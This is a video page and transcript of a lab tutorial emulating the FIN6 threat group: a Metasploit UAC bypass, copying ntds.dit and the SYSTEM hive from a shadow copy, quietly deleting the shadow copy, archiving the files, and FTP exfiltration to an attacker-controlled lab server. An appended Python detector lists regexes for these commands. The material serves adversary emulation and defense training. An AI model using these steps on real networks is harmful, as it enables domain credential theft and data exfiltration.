How FIN6 Exfiltrates Files Over FTP
HackerSploit · 09.04.2025 · 24:40 · 13,393 views · 332 likes


Video description
Access the FIN6 Exfiltration Lab: https://bit.ly/3XsXFRZ

In this final episode of our FIN6 Adversary Emulation mini-series, we demonstrate how to emulate FIN6's exfiltration techniques, focusing on how this financially motivated threat actor collects, stages, archives, and exfiltrates sensitive data from compromised systems.

// CYBER RANGES Adversary Emulation Labs
► New to CYBER RANGES? Register for a free account here: https://bit.ly/42VxDu5
► Access the FIN6 Exfiltration Lab: https://bit.ly/3XsXFRZ
► Adversary Emulation Fundamentals Labs (Free): https://bit.ly/4gQd8SB

🔗 Video Resources & References
CTID Adversary Emulation Library: https://github.com/center-for-threat-informed-defense/adversary_emulation_library

🎥 Have an idea for a video? Make your submission here: https://forms.gle/VDwwMsuudzQfT9VM6

// MORE RESOURCES
HACKERSPLOIT BLOG ►► https://bit.ly/3qjvSjK
HACKERSPLOIT FORUM ►► https://bit.ly/39r2kcY
HACKERSPLOIT ACADEMY ►► https://bit.ly/39CuORr
CYBER RANGES (LABS) ►► https://app.cyberranges.com

// SOCIAL NETWORKS
TWITTER ►► https://bit.ly/3sNKXfq
INSTAGRAM ►► https://bit.ly/3sP1Syh
LINKEDIN ►► https://bit.ly/360qwlN
PATREON ►► https://bit.ly/365iDLK
MERCHANDISE ►► https://bit.ly/3c2jDEn

// MY BOOKS
Privilege Escalation Techniques ►► https://amzn.to/3ylCl33
Docker Security Essentials (FREE) ►► https://bit.ly/3pDcFuA

// SUPPORT THE CHANNEL
NordVPN Affiliate Link (73% Off) ►► https://bit.ly/3DEPbu5
Get $100 In Free Linode Credit ►► https://bit.ly/3yagvix

// CYBERTALK PODCAST
Spotify ►► https://spoti.fi/3lP65jv
Apple Podcasts ►► https://apple.co/3GsIPQo

// WE VALUE YOUR FEEDBACK
We hope you enjoyed the video and found value in the content. We value your feedback. If you have any questions or suggestions, feel free to post them in the comments section or contact us directly via our social platforms.

// THANK YOU!
Thanks for watching! (repeated in Russian, Finnish, German, Chinese, French, Portuguese, Urdu, Hindi, Italian, Spanish and Arabic)

#pentesting #cybersecurity #hacker

Contents (5 segments)

Segment 1 (00:00 - 05:00)

Hey guys, HackerSploit here, back again with another video. Welcome back to the Adversary Emulation series. I apologize for the lag between the previous video and this one, but we're pretty much going to be continuing from where we left off, which was the FIN6 emulation plan. We had already obtained initial access. We also explored, as part of that, the various ways of creating Word macros or VBA macros for initial access, and then in the previous video we explored Active Directory enumeration, and the objective there, based on the emulation plan, was to stage this information for exfiltration. So in this video we're going to be continuing by taking a look at privilege escalation as per the emulation plan, and then staging a couple of additional files for exfiltration. These are just files, or information, that we'll obtain through local enumeration, but they're quite important and require elevated privileges. Then we'll pretty much be wrapping up the FIN6 emulation plan: once we've staged the files we're going to be creating the archive and then exfiltrating over FTP. So, if you're new to this series, I highly recommend you take a look at the series, or the first video in the series. A link to that will be in the description section. And likewise, if this is your first time watching this series, we will be going through this demonstration using a set of labs on the CYBER RANGES platform. If you're new to CYBER RANGES, you can register for an account at app.cyberranges.com. A link will be in the description section. And it's absolutely free.
Once you've created an account, just navigate to the Community or Free section, as you can see here, and you'll find the MITRE ATT&CK Defender Adversary Emulation Fundamentals playlist of labs. So it's absolutely free, and the FIN6 emulation plan is pretty much iterated in lab 1.3, which is what we're going to be using. So you can just click on that lab and start it up. You'll be provided with access to your own Kali Linux system and the target domain controller, which is running Windows Server 2019. A link to the lab and the playlist of labs will also be in the description section. But let's not waste any more time. I'm going to be continuing from where we left off. We had already performed Active Directory enumeration, and we had staged all of the files containing the information we enumerated in the Public user's home directory. So that's where we're going to be continuing from. All right. As you can see, I have already obtained access to the target system, and I've already performed everything that we did up to the last point in the previous video. So these are all the files that we had staged: pretty much AD enumeration, where we saved the info in text files. As I mentioned in the previous video, if you follow the emulation plan, it involved opening the macro-enabled document we used for initial access with elevated privileges. So you essentially launch Word as admin and then open the document, which would mean you get elevated privileges in any case. But we didn't follow that, and the reason for that will become apparent: if you want to take a look at a more realistic privilege escalation vector, that's what we'll be doing.
So I'll just terminate out of my PowerShell shell here, and if we follow the emulation plan, I'll just zoom in so you can see this a little bit better. It says to type in getsystem, and you'll see that fails. All right. So we will put this session in the background, and I will now search for the bypass UAC module. The one we're looking for, the one that works on Windows Server 2019, is this one right over here, bypassuac_comhijack. So I'll say use 12. Then, all right, no payload. Show options. Let's check the architecture of my session. It's 64-bit, and so if we say set payload to windows/x64, let's see whether that will bring up anything. Okay, no. So this is one of the issues with

Segment 2 (05:00 - 10:00)

the new version of Metasploit. And what I'll do, I'll just switch into full screen so it's clearer for you. So this is something that, I wouldn't say it's an issue in Metasploit or MSF6, but with certain older modules that didn't have the architecture specified, you can only set a 32-bit Meterpreter payload. So if I say windows, in this case, you can see that there's not going to be the option for the 64-bit Meterpreter session, which I need because the current session I have is 64-bit, or of 64-bit architecture. So what we'll need to do is modify this exploit module to support that. So I'll just go ahead and open up a new terminal, and I'll use Vim to modify the exploit module Ruby file. So sudo vim, and I'll say /etc, actually no, that's going to be stored under /usr/share/metasploit-framework, exploits. No, no, it's going to be under modules/exploits. We're going to say windows and then local, I believe, and then bypass. It should be in this folder, I think. Let's see what's under local. So bypassuac_com, it should be in here. So we'll say bypassuac. What we're looking for is the com hijack, so it's just _comhijack.rb, and we'll just open this up and go all the way to where the module info is specified. Right over here. So platform: as I suspected, there's no architecture. So what we need to do in order to use a 64-bit Meterpreter payload is just modify this here, and I'm just going to switch to a different browser because this is a bit slow. So just give me a second. All right, that should be much better. So under platform I will just say, over here, this would be Arch, I'm pretty sure, and then we'll say both.
So for the architecture we'll say x86, and then I believe it's the same for x64. So we'll just close that up there and then do that there, and then write and quit, and then we'll go back into Metasploit. And now we need to reload_all; this will reload the modules so that they load with the new configuration. By the way, the only reason I'm showing you this is that if you're using the latest version of Metasploit, you're going to experience this issue quite a bit with some of the older modules that didn't have the architecture explicitly defined. It's not that they don't support different payloads with different architectures; it's really that they are undefined, and there are some strictures within Metasploit that prevent that. So now I'll just say search bypassuac. I know I already have the module loaded, but we want, where is it, comhijack. It's still not showing the supported payloads. But now if I say set payload windows/x64, there we are. Fantastic. Meterpreter reverse TCP. Okay. So session ID is one. So show options. I'll set the LPORT to something different so I can differentiate. So we'll say set session 1 and then exploit, and this should allow us to elevate our privileges and get an elevated Meterpreter session on the target. So let's see if this works. Hopefully it does, or I need to set the target option, maybe. Probably, but we'll just let this run and see if we get a session. All right, just had to run it one more time, and so there we are.

Segment 3 (10:00 - 15:00)

We get a Meterpreter session. So this info, we can see the target DC. It's 64-bit. And now we can proceed with staging some additional files that require elevated privileges. One of which is to create a volume shadow copy of the entire C drive. So what is a volume shadow copy? A volume shadow copy is pretty much a snapshot, if you will, of a set of files, in this particular case files within the C drive. And the advantage of creating a volume shadow copy is that we can access or copy files even when the Windows-specific files are being used, or when the operating system is running. So it's sort of like taking a snapshot of the Windows system, right? In order to do this, you obviously need elevated privileges, and I'll just navigate to C:\Users\Public. I'll open up a shell. So if I say whoami here, whoami /priv, like so, you can see we have that there. In any case, we can use vssadmin and we're going to say create shadow, and then for C. I think we just need to specify the drive here, so /for=C:, and it's going to create it. Pay attention to the shadow copy details: you have the shadow copy ID and then the volume name. We're going to need the volume name here; we don't just want the actual name itself but pretty much the entire path. So we're now going to copy the ntds file from the shadow copy, because we have the directory here, into our current working directory, which is C:\Users\Public. So we're just going to copy this here, like so. And we're now going to say copy, paste this in here, and say we want Windows, NTDS, and ntds.dit. And then we want to copy it to Users, let's see if I'm typing that correctly. My bad, I've made a mistake there. So we're just going to say copy, Windows\NTDS, and then ntds.dit.
And we'll copy it into C:\Users\Public, and we'll say AD_ntds. We'll maintain the file prefix AD because that will be important when we'll be compressing the files or staging them for exfiltration. I'll hit enter. So we should see it now, if I can actually find it in here. One second. AD_nt... we should see it here. There we are, we have it right over here. And now we can also copy the registry, the SYSTEM registry hive and the system configuration file, into the current working directory. That can be easily done by saying, oh, that's weird. So we can say reg save HKLM\SYSTEM, so HKEY_LOCAL_MACHINE\SYSTEM, and then C:\Users\Public, and we'll just call it AD_sys.reg. Okay. And then we'll say copy, and we're going to get the shadow copy name again, which I believe I'd already copied. So Windows\System32\config, and then it's SYSTEM, I believe. So SYSTEM, and then we want to copy it to C:\Users\Public\AD_system.cfg. All right. So that's copied here, and we should have everything we need. One thing you can also do, I don't think it's explicitly part of the emulation plan, is to delete the shadow volume, sorry, not

Segment 4 (15:00 - 20:00)

the shadow volume, the shadow copy that we created. You can easily do that by saying vssadmin delete shadows /shadow=, and you need the volume ID. So you can do that if you want to. Let's actually do it here. Where's the ID? In this case we actually need the ID here, like so. Just going to copy that there. So shadow volume ID, and then we can say do this quietly, so just some stealth over here. That's weird. So vssadmin delete shadows /shadow= the volume ID, and then I said /quiet. Let's see. I need to specify the ID with brackets. So we'll say vssadmin delete shadows /shadow=, let me just put that in there like so. I think that is what I was missing. Yeah, I think that's done it. Okay, so we now move on to the next step. We've completed local enumeration, or discovery, and we've collected all the files that we require. Now, FIN6 archives all their collected data using a renamed command-line version of the 7-Zip executable. It's already set up on the Windows system, it's part of the environment, so you don't have to do it. What it is known to be called is 7.exe. And they typically do the following. So -mx3 is the type of compression there. And then, in this case, they've been known to call it something like AD.7z. And what we want to compress is any file with the prefix AD_, so we'll use the wildcard operator and hit enter. All right. So there we are. It's created the 7-Zip archive, which we can now exfiltrate. So we're now moving on to exfiltration. The last task in this emulation plan is to exfiltrate what we've collected, and more specifically that 7-Zip archive.
At the time when this lab was created, the emulation plan called for the use of plink.exe. Based on what is known, they have been known to exfiltrate over the web primarily, but that particular emulation plan, or the plan that was used to build this lab, did not clarify the technique, the procedures to perform the file transfer, or the procedures to emulate with regard to performing the file transfer via web service. So instead of simply using an alternative procedure, we can try and utilize another technique or procedure, in this case really just a protocol. What we're going to be doing is taking a look at how to exfiltrate via FTP. The first thing we need to do is set up an FTP server on the Kali Linux system, which we can easily do. I'm currently within the lab 1.3 folder here on the Kali Linux system. And we can use the Python 3 module pyftpdlib, I believe it's called. Then we'll say port 21. The directory is home, attacker, adversary emulation, and then labs; we'll save it in lab 1.3. And we'll set a user, and we'll just call it ftpuser. Of course, a real adversary will not keep things this simple. And then the password, we'll just call it ftppass, because I know that I will forget this. So that'll set up the FTP server on the Kali Linux system. And now we can go onto the Windows system, and we will be utilizing the Windows FTP client. Now, the Windows FTP client is interactive, which means we can't use a Meterpreter session; we need to have a native shell, which we do. So in order to make this easy, we'll create an FTP file containing the commands or arguments that we want the FTP server, sorry, the FTP client

Segment 5 (20:00 - 24:00)

to execute. In this case, we want the FTP client on Windows to reach out to the FTP server on the Kali Linux system, authenticate, and then pretty much put, or upload, the AD.7z archive that we created here, which contains all the information that we enumerated or collected. In order to do this we're just going to use a text file, and we'll put in our FTP arguments. The first thing we need to do is say open 192.168.125.103, the Kali Linux IP address which is hosting the FTP server, and we'll just save it in ftp.txt. We then need to authenticate, so we say ftpuser, that's going to be the username, and we're just going to append it to ftp.txt, so not overwrite the file, but add it as an additional argument. And then we're going to say echo ftppass >> ftp.txt. Then we want to say echo put, this is where we now upload the archive, the 7-Zip file, >> ftp.txt. And then we also want to terminate the connection by saying bye, standard FTP commands or syntax, >> ftp.txt, and hit enter. And now if I say type ftp.txt, you can see that that's there. So we can now utilize the Windows FTP client and pass our text file that contains the commands by saying ftp -s:ftp.txt. Hit enter. And it looks like it worked. So we can go into the FTP server here. Let's see: FTP logged in, stored the following. And now if we check the folder on the Kali Linux system, adversary emulation labs, lab 1.3, we have AD.7z. I don't think we can extract it on this system because we don't have the 7-Zip utility. I think we do. But this will contain all the files, and if we switch over to the Windows system we'll be able to see the archive created and what is stored inside. So let me actually do that. I'm just going to switch over to the Windows system. All right.
So I'm on the Windows system now, and I'll just open up a File Explorer. So where did we save it? C:\Users\Public, and there we are. So I think WinRAR can actually extract it. So you can see that it is a functional archive. In here we should have everything we... So we have the SYSTEM registry hive and configuration, the AD_ntds file here, and all the info that we enumerated. We can open this up here, where we enumerated computers, and so on and so forth. So this sort of represents the first phase of the emulation plan, which is what FIN6 typically does. Once they gain initial access, they perform enumeration, they exfiltrate the information that they've gathered or collected about the target environment, and then they move on to stage two, which is not going to be part of what we're emulating. But with that being said, that brings us to the end of this video and the emulating FIN6 series. We're now going to be moving on to emulating APT29. So there's going to be a lot of advanced stuff in there, ranging from resource development and payloads. We're going to be using a PDF and a LNK file, or a shortcut, for initial access. So it's pretty much going to encompass everything you guys wanted. But remember, this first series on FIN6 was meant to be relatively simple, but hopefully it sets the stage for the other series. In any case, as I said, that's going to be it for this video. If you enjoyed this video and found value in it, please leave a like down below. If you have any questions, comments, or suggestions, leave them in the comment section. And as always, all the links, and links to the labs, will be in the description section. But yeah, that brings us to the end, and I'll be seeing you guys in the next video.
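As an added example following the full transcript (my code, not the video's and not from the CTID emulation library), here is the detection logic a defender could run over process-creation telemetry to spot the collect, stage, archive and FTP-exfil chain the video walks through: vssadmin shadow creation, ntds.dit copied out of the shadow copy, the SYSTEM hive saved, shadow deletion, the renamed 7.exe archiving AD_* files, and ftp -s: with a script file. It assumes each record carries host, user, image and full command line, as Sysmon Event ID 1 or Windows event 4688 with command-line auditing do; the sample events are constructed to mirror the lab, with a placeholder shadow-copy ID, plus one host where a scripted ftp run appears without any staging so the chain rule does not fire on ordinary admin use.

```python
"""Score process telemetry for a FIN6-style collect -> stage -> archive -> FTP chain.

Added detection example; not code from the video or the CTID library.
Assumption: records look like Sysmon Event ID 1 / Windows 4688 with command lines.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    user: str
    image: str      # executable name as recorded by the sensor
    cmdline: str    # full command line


# Stage label -> regex over the command line. Patterns follow the commands shown
# in the video; "7.exe" is the renamed 7-Zip binary the video describes.
RULES = {
    "shadow_copy_created": re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I),
    "ntds_copied_from_shadow": re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\ntds\.dit\b", re.I),
    "system_hive_saved": re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I),
    "shadow_copy_deleted": re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I),
    "renamed_7zip_archiving": re.compile(r"(^|\\|\s)7\.exe\s+a\s", re.I),
    "ftp_scripted_upload": re.compile(r"\bftp(\.exe)?\s+-s:\S+", re.I),
}

# Stages that mean credential material was staged from disk.
STAGING = {"ntds_copied_from_shadow", "system_hive_saved"}


def match_stages(cmdline: str) -> list[str]:
    """Return every stage label whose pattern matches one command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def stages_per_host(events) -> dict[str, set[str]]:
    """Group matched stages by host so the chain is judged per machine."""
    seen: dict[str, set[str]] = {}
    for ev in events:
        hits = match_stages(ev.cmdline)
        if hits:
            seen.setdefault(ev.host, set()).update(hits)
    return seen


def is_exfil_chain(stages: set[str]) -> bool:
    """True only when secrets were staged AND a scripted FTP upload ran on the same host.

    A lone ftp -s: run is common enough in admin tooling to be noise; combined
    with ntds.dit or SYSTEM-hive staging it is a high-confidence signal.
    """
    return bool(stages & STAGING) and "ftp_scripted_upload" in stages


def alerting_hosts(events) -> list[str]:
    """Hosts on which the full staging-plus-exfil chain was observed."""
    per_host = stages_per_host(events)
    return sorted(h for h, st in per_host.items() if is_exfil_chain(st))


# Constructed sample telemetry mirroring the lab's command sequence (DC01), one
# host with only a scripted ftp run (WS02), and one benign host (WS03).
SAMPLE_EVENTS = [
    ProcEvent("DC01", r"CORP\admin", "vssadmin.exe", "vssadmin create shadow /for=C:"),
    ProcEvent("DC01", r"CORP\admin", "cmd.exe",
              r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit "
              r"C:\Users\Public\AD_ntds.dit"),
    ProcEvent("DC01", r"CORP\admin", "reg.exe",
              r"reg save HKLM\SYSTEM C:\Users\Public\AD_sys.reg"),
    ProcEvent("DC01", r"CORP\admin", "vssadmin.exe",
              "vssadmin delete shadows /shadow={SHADOW-ID-PLACEHOLDER} /quiet"),
    ProcEvent("DC01", r"CORP\admin", "7.exe", "7.exe a -mx3 AD.7z AD_*"),
    ProcEvent("DC01", r"CORP\admin", "ftp.exe", "ftp -s:ftp.txt"),
    ProcEvent("WS02", r"CORP\backupsvc", "ftp.exe", "ftp -s:nightly_sync.txt"),
    ProcEvent("WS03", r"CORP\jdoe", "notepad.exe", r"notepad.exe C:\Users\jdoe\notes.txt"),
]


if __name__ == "__main__":
    for host, stages in stages_per_host(SAMPLE_EVENTS).items():
        print(host, sorted(stages), "ALERT" if is_exfil_chain(stages) else "ok")
    print("alerting hosts:", alerting_hosts(SAMPLE_EVENTS))
```

The per-host grouping is the point: each command on its own (a shadow copy, a reg save, a scripted ftp run) has a legitimate use, so the rule only alerts when staging of ntds.dit or the SYSTEM hive and the scripted upload land on the same machine, which is exactly the combination the lab produces.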
